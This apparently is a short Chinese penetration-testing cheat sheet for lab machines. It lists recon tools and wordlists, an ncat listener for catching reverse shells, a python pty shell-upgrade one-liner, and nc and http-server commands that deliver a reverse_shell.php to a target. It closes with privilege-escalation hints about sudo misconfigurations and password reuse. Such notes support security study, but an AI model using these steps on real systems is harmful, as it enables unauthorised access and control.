主要的工具一般下载kali基本齐全

信息收集

nmap

目录枚举, dirbuster, gobuster, dirsearch

kali自身拥有一些字典, 比如/usr/share/wordlists/dirbuster/下的文件, /usr/share/wordlists/rockyou.txt.gz等

流量捕获/分析

burpsuite

wireshark

利用ncat在端口上进行监听, 利用生成或者现成的反弹shell获得连接, 随后可能利用python获取一个交互shell

下面是一个获取pty交互式shell的方式

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo;fg

利用py开启一个简单的http服务, 让另一方利用wget下载即可(自定义端口)

python -m SimpleHTTPServer 80
python3 -m http.server 8081

或者双方都有ncat, 可以利用ncat传输

# 靶机: 将返回数据存储到reverse_shell.php
nc 192.168.56.5 10000 > reverse_shell.php
# kali: 端口被访问时提供reverse_shell.php的文件内容
nc -lvnp 10000 < reverse_shell.php

甚至还有MacPEAS

了解有什么本地脆弱性, 才能更好的提权

用于横向移动甚至越权

-h或-help并不是完整的帮助信息, 如果需要则使用man命令(manual的缩写). 此时如果部分程序有命令执行功能, 这就是一个可能的漏洞点

部分用户在特定目录有sudo权限, 或者访问控制没做好, 可以利用这个获取root/shell

顾名思义, 可能部分服务/用户/程序用户密码都是一样的

没有及时更新补丁/系统导致的, 这个一般放在最后因为可能会对系统造成影响